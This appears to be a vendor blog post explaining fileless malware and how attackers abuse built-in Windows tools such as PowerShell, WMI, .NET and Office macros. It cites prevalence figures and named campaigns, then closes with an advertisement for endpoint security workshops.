Fileless Malware: When Windows Turns On Itself

As endpoint security tools become more effective at stopping malware embedded within executable or opened files, attackers have developed new vectors into the enterprise. One example of this is fileless malware: a form of attack against Windows and other operating systems that evades detection with traditional antivirus or endpoint protection products.

What is fileless malware?

In file-based attacks, a binary payload is downloaded onto the target machine and executed to carry out malicious actions. Legacy antivirus can prevent these known attacks by identifying the signature of the malware and comparing it to a database of known malware. If the signature is found, the antivirus prevents it.

Fileless malware attacks turn this idea on its head by presenting no indicators of malicious executables on the target machine. Instead, attackers use legitimate tools built into the system like PowerShell, WMI, Microsoft Office Macros and .NET for malicious purposes. Essentially, Windows is turned against itself.

Fileless attacks can be a powerful tool for attackers, since they are able to bypass the majority of antivirus and next-generation antivirus products. Though fileless attacks have been discussed in mainstream circles since the early 1990s, these attack vectors are still gaining popularity.

And the data proves it. In Q1 2018, fileless attacks were up 94 percent. In 2018, 42 out of every 1,000 endpoint attacks used fileless malware. To put that into perspective, ransomware maxed out at 14.4 out of every 1,000 endpoint attacks.

In The State of Endpoint Security, The Ponemon Institute found respondents believe 38 percent of all attacks targeting their company will be fileless in 2019. With the growing use of this kind of attack, all enterprises should be aware of what fileless malware can look like and how to combat it.

Living off the Land

Using legitimate tools for malicious purposes is a technique called Living off the Land that has been around for at least twenty five years. Fileless malware leverages trusted, legitimate processes running on the operating system to perform malicious activities like lateral movement, privilege escalation, evasion, reconnaissance and the delivery of payloads.

The abused, legitimate tools are known as LOLBins and can include Microsoft Office Macros, PowerShell, WMI and many more system tools. In fact, there are more than 100 Windows system tools that can be leveraged in this technique.

PowerShell

PowerShell is a cross-platform, open source task automation and configuration management framework created by Microsoft to automate common tasks. It is a saving grace for administrators to automate tedious, repetitive tasks on a daily basis, which makes it nearly impossible to blocklist. PowerShell is very commonly used as a LOLBin by attackers because it evades traditional antivirus.

PowerShell is powerful. You can use PowerShell to display all installed USB devices on all computers on the network. You can use it to set a task running in the background. You can use it to kill processes or export information about a machine. This is what makes PowerShell so critical for IT administrators. They can automate away many of the tasks they need to accomplish to focus on other tasks.

WMI

Windows Management Instrumentation (WMI) is a Microsoft standard for accessing management information about devices in an enterprise environment. WMI has been ingrained in the Windows operating system since Windows NT 4.0 and Windows 95.

WMI is all about the management of Windows devices on a network. It can give you information about the status of local or remote machines and can be used to configure security settings like system properties, user groups, scheduling processes or disabling error logging.

WMI is valuable to administrators that need to easily manage all machines on the network — a task that happens regularly in an enterprise. This management is critical for the success of an IT department, which also makes it impossible to remove from their day-to-day life.

.NET

.NET is a framework built by Microsoft to develop a wide range of applications. It gives access to an infrastructure of functions that developers use frequently and can build off of. It is used with several programming languages, including C#, VB.NET Shop, C++ and F#. It can be used to create Windows-based applications, cloud applications, artificial intelligence applications or even cross-platform applications.

.NET is an effective technique for malware authors to leverage, since applications that use .NET save developers time by giving them easy access to core machine functionality, and can be run on multiple platforms and architectures.

It's important to note that .NET is not really a tool, but rather a technique. Attackers use .NET APIs that are available in Windows systems to execute their malicious code.

Office Macros

In Microsoft Office, Macros are used to automate frequent tasks. They are typically created in Word documents or Excel spreadsheets as a series of commands grouped together to complete a task automatically. Many macros are made using Visual Basic for Applications and can be written by anyone, including software developers.

Using macros for fileless attacks is convenient, since they can easily be combined with phishing to trick a user into downloading and running a secretly malicious file. In an enterprise, receiving a Word document is a common occurrence, and most individuals would not think twice about opening it. In the case of a malicious Word document, this results in an attack.

It's important to note that Microsoft has added protections to restrict or even block Macros. However, these protections are not often implemented or are easily bypassed by attackers or users.

Widespread fileless attacks

The Cybereason research team have come across and prevented or detected many cases of fileless attacks just in 2019 alone. It has seen that attackers use a range of default Windows processes in their attacks, including:

PowerShell: with attacks like Operation Cobalt Kitty, the Ramnit Banking Trojan, the Triple Threat of Emotet, TrickBot, Ryuk and the Fallout Exploit Kit
Windows Management Instrumentation (WMI): with attacks like Operation Soft Cell, the Shade Exploit Kit, Adobe Worm Faker and GandCrabs Evasive Infection Chain
.NET: with attacks like the New Ursnif Variant
Malicious Macros: with attacks like the New Ursnif Variant

You can learn about all these and more on Cybereason's blog. Take note: this is not nearly an exhaustive list of processes used for fileless attacks. However, we want to point out these cases that, with proper defense, could be prevented before any damage takes place.

Fileless malware is hard to detect

Fileless malware depends on tools that are part of the daily workflow of enterprise professionals. Attackers know they can rely on a set of tools that are pre-installed on every Windows machine and are vital for the daily operations of the enterprise. Fileless malware also decreases the number of files on disk, which means signature-based prevention and detection methods will not be able to identify them.

This makes it incredibly difficult for an analyst or security product to identify whether the tool is being used for malicious purposes or normal, day-to-day actions. Analysts must have an intimate understanding of their environment to be able to identify LOLBins at work.

This is one reason why fileless malware attacks have become so prevalent. We only expect them to become more common as attackers continue to iterate and share their techniques with the community, and as they potentially develop this malware for profit under a malware-as-a-service model.

Why attackers love fileless malware

Many LOLBins are incorporated into the daily workflow of IT professionals, which again, makes blacklisting them impractical given how it would reduce IT's efficiency and reach. Naturally, the tools with the most power, reach and ubiquity become the most common tools for attackers to leverage.

This means Windows toolkits are the most attractive, since they include tools and suites like PowerShell, WMI and Office by default. The attackers know they have a set of tools they can leverage that are not only pre-installed on every Windows machine they want to target, but are also vital to the organization and cannot be shut down.

Fileless malware also decreases the number of files on disk and the number of actions an attacker has to take to execute an attack. Further, in order to identify this type of attack, security tools have to focus on something other than signatures: how the tools are accessed, what they do and what users spawn, which is not the way traditional security tools like antivirus operate.

This makes defense much more difficult. To face this, a new form of prevention and new types of telemetry for detection that can handle these attacks must enter the picture.

How we can help

WWT offers a variety of high-value workshops and conversation accelerators to help you improve your endpoint security posture, regardless of the starting point. These include:

Cyber Posture Assessment (delivered with Cybereason): A low-overhead assessment of your endpoint security infrastructure developed to provide actionable intelligence about your existing security ops programs and an in-depth assessment of your overall breach readiness
Security Tools Rationalization Workshop: A 2-8 hour on-site workshop to assess whether your organization has the pervasive enterprise visibility, granular security control and rapid response capabilities required to deliver secure business outcomes (commercial) and mission success (federal)
Endpoint Security Workshop: An on-site workshop to provide a customized endpoint assessment that enables you to understand emerging threats and develop an endpoint security strategy for next-gen malware and ransomware